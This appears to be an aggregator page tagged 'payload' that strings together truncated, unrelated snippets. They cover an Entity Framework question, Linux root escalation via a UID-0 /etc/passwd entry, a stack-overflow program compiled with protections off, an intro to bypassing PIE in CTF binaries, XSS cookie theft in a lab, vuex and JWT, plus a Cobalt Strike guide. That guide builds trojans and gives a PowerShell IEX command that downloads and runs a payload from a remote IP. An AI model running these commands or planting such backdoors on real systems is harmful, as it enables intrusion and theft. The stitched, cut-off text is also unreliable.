payload

Entity Framework Code First Self Referencing Parent Child with Payload

故事扮演 提交于 2019-12-18 08:29:44
问题 I'm attempting to set this up using code first in entity framework and am running into difficulty. To describe what i'm trying to accomplish: Have an entity of Product. This product optionally may have one or more related "child" products. A product can be the child to one or more parent products. when I go to generate a controller tied to the model class "Product", i'm getting an error: (updated, more specific, matches code below) There was an error running the selected code generator:

Linux提权(持续更新)

柔情痞子 提交于 2019-12-18 04:43:12
利用/etc/passwd提权 个人认为,这种提权方式在现实场景中难以实现,条件太过苛刻,但是建立Linux下的隐藏账户是个不错的选择,灵感来自: https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/ 利用条件 拥有一个普通用户的权限 普通用户有 /etc/passwd 的写权限 利用原理 目前不是特别清楚,只知道Linux下的 /etc/passwd 用于标识账户信息, /etc/shadow 用于标识密码信息, /etc/group 用于标识用户组信息 利用细节 直接修改 /etc/passwd ,先观察root用户的格式: root:x:0:0:root:/root:/bin/bash root表示用户名;x表示密码hash,0表示用户ID,0表示用户组ID,/root表示用户相关信息,/bin/bash表示该用户使用何种shell执行命令 举个例子: test:passwd_hash:0:0::/bin/hash 这里只要设置密码hash值即可,制作密码hash有以下几种方式: OpenSSL openssl passwd -1 -salt salt password mkpasswd mkpasswd -m SHA-512 password Python

Payloads of HTTP Request Methods

泄露秘密 提交于 2019-12-17 07:00:48
问题 The Wikipedia entry on HTTP lists the following HTTP request methods: HEAD: Asks for the response identical to the one that would correspond to a GET request, but without the response body. GET: Requests a representation of the specified resource. POST: Submits data to be processed (e.g., from an HTML form) to the identified resource. The data is included in the body of the request. PUT: Uploads a representation of the specified resource. DELETE: Deletes the specified resource. TRACE: Echoes

Linux_x86_Pwn溢出漏洞

做~自己de王妃 提交于 2019-12-17 06:48:06
基础栈溢出:未开启任何保护的程序 漏洞程序源码 #include <stdio.h>#include <stdlib.h>#include <unistd.h>​void vulnerable_function() { char buf[128]; read(STDIN_FILENO, buf, 256);}​int main(int argc, char** argv) { vulnerable_function(); write(STDOUT_FILENO, "Hello, World\n", 13);} 编译: gcc -fno-stack-protector -z execstack -o vuln vuln.c -g-fno-stack-protector #关闭PIE(堆栈保护)-z execstack #关闭NX(DEP) 堆栈保护相关参数 gcc -fno-stack-protector //禁用堆栈保护gcc -fstack-protector //启用堆栈保护,针对有字符串数组的函数gcc -fstack-protector-all //启用堆栈保护,针对所有函数gcc -fstack- protector-strong //更强版本 关闭系统ASLR su rootecho 0 > /proc/sys/kernel/randomize_va_spaceexit

CTF必备技能丨Linux Pwn入门教程——PIE与bypass思路

|▌冷眼眸甩不掉的悲伤 提交于 2019-12-17 06:47:44
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程。 教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会封装在Docker镜像当中,并提供调试用的教学程序,来自历年赛事的原题和带有注释的python脚本。 课程回顾>> Linux Pwn入门教程第一章:环境配置 Linux Pwn入门教程第二章:栈溢出基础 Linux Pwn入门教程第三章:ShellCode Linux Pwn入门教程第四章:ROP技术(上) Linux Pwn入门教程第四章:ROP技术(下) Linux Pwn入门教程第五章:调整栈帧的技巧 Linux Pwn入门教程第六章:利用漏洞获取libc Linux Pwn入门教程第七章:格式化字符串漏洞 今天i春秋与大家分享的是Linux Pwn入门教程第八章:PIE与bypass思路,阅读用时约20分钟。 01、PIE简介 在之前的文章中我们提到过ASLR这一防护技术。由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用。因为ASLR技术的出现,攻击者在ROP或者向进程中写数据时不得不先进行leak,或者干脆放弃堆栈

Cobalt Strike 简单使用

允我心安 提交于 2019-12-17 01:24:29
1、运行服务端 其中afanti就是密码 2、客户端 用户名随意写,密码添afanti 3、创建listener 4、生成木马客户端 Attacks->Packages->Windows Executable 选择刚刚生成的listener,生成木马到桌面。 双击artifact.exe木马,客户就能上线。 另一种上线方式 Attacks->Packages->Payload Generator 选择一种语言生成payload Attacks->web Drive-by->Scripted Web Delivery 这个模块相当于搭建一个web服务器,将payload放到服务器上让客户端下载执行。 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.61.128:80/aaa'))" 通过msf接收shell 在Cobalt Strik中执行,先添加一个监听命令,名称为:msf payload选择:windows/foreign/reverse_tcp 监听端口:4444 选择刚刚建立的msf_litener msf配置好在交互界面点击spawn就会把shell弹到msf上,shell弹回来 beacon模块使用 截屏 运行截图命令

pikachu平台之xss漏洞

不想你离开。 提交于 2019-12-16 11:01:43
反射型xss(get) 原理 传递的参数直接存在页面代码中,而且没有过滤 流程 打开页面 发现有长度限制,F12进行修改 。 输入特殊字符,检查是否有过滤 发现并没有过滤,而且直接在页面代码中了 存在xss漏洞,尝试输入 <script>alert(xss)</script> ,发现有长度限制,用F12修改后。 反射型xss(post) xss(post)攻击的基本原理 方便起见,都用本地了 攻击者 127.0 .0 .1 受害者 127.0 .0 .1 漏洞服务器 127.0 .0 .1 先尝试登陆,默认admin/123456 接下来修改post.html,诱使被攻击者点击链接,访问该页面,进而触发自动提交表单,获取其cookie。 诱使被攻击者点击链接 http://192.168.171.129/pikachu/pkxss/xcookie/post.html 当被攻击者点击之后,其cookie等信息自动提交到接受服务器。 攻击成功! 存储型xss 原理: 存储型XSS和反射型XSS形成的原因是一样的,不同的是存储型XSS下攻击者的可以将脚本注入到后台存储起来,构成更加持久的危害 我们在pikachu尝试留言 发现可能存在存储型xss漏洞 输入 <script>alert("xss")</script> 提交之后 发现有存储型xss漏洞,刷新就会弹出,攻击成功! XSS案例

Cobalt Strike学习笔记

生来就可爱ヽ(ⅴ<●) 提交于 2019-12-16 10:50:16
  Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。Cobalt Strike主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。    Cobalt Strike ,据说现在最新版为3.9,主要分为试用版和付费版,试用版为21天,付费版3500美元,据说网上也有一些 破解教程 , cobaltstrik3.6破解版下载 密码: 51tg。因为Cobalt Strike是美国对外限制型出口软件,只在美国和加拿大允许发售,所以我们需要google搜索下usa的个人代理来绕开限制。 0x01 安装与运行   Cobalt Strike需要JAVA环境,需要注意的是JAVA环境不要安装最新版,否则会出一些问题,Cobalt Strike分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上,或者自己想要搭建的环境中,服务器端只能运行在Linux系统上。其中关键的文件是teamserver以及cobaltstrike.jar,将这两个文件放到服务器上同一个目录,然后运行:

vuex源码阅读分析

廉价感情. 提交于 2019-12-16 10:16:18
这几天忙啊,有绝地求生要上分,英雄联盟新赛季需要上分,就懒着什么也没写,很惭愧。这个vuex,vue-router,vue的源码我半个月前就看的差不多了,但是懒,哈哈。 下面是vuex的源码分析 在分析源码的时候我们可以写几个例子来进行了解,一定不要闭门造车,多写几个例子,也就明白了 在vuex源码中选择了example/counter这个文件作为例子来进行理解 counter/store.js是vuex的核心文件,这个例子比较简单,如果比较复杂我们可以采取分模块来让代码结构更加清楚,如何分模块请在vuex的官网中看如何使用。 我们来看看store.js的代码: import Vue from 'vue' import Vuex from 'vuex' Vue.use(Vuex) const state = { count: 0 } const mutations = { increment (state) { state.count++ }, decrement (state) { state.count-- } } const actions = { increment: ({ commit }) => commit('increment'), decrement: ({ commit }) => commit('decrement'), incrementIfOdd ({

JWT (上):认识 JSON Web Token

不羁的心 提交于 2019-12-16 07:23:33
什么是 JWT? JSON Web Token(JWT)是一种开放标准(RFC 7519),它定义了一种紧凑且自包含的方式,作为JSON对象在各方之间安全的传递信息。这个信息可以通过数字签名进行验证并信任。JWTs 可以使用密钥(结合HMAC算法)或者 使用RSA、ECDSA加密的公钥私钥对进行签名。 尽管JWTs能够在各方之间也提供安全加密,但是仍专注于签名Token。当其他方隐藏了加密Token的某些声明时,签名Token可以验证声明的完整性。当Token使用公钥私钥对进行签名时,这个签名还能证明只有拥有私钥的一方才是签发它的一方。 什么时候使用 JWT ? 授权 :这是JWT最普遍的使用场景了。当用户登录之后,每次请求都包含JWT,允许用户访问那些只有携带token才能访问的路由、服务、资源。如今在单点登录中广泛使用了JWT,因为JWT体积小,且能够在不同域名之间被使用。 信息交换 :JWT是一种在各方之间安全传输信息的好方式。因为JWTs能够签名,比如使用公钥私钥对,你能够确定发送者的身份。另外,签名是使用header和payload计算而来,所以你也可以验证内容是否被篡改。 JWT的结构 jwt 包含三部分,之间以点(.)分隔 Header(头部) Payload(负载) Signature(签名) 一个典型的jwt如同下面这样: xxxxx.yyyyy.zzzzz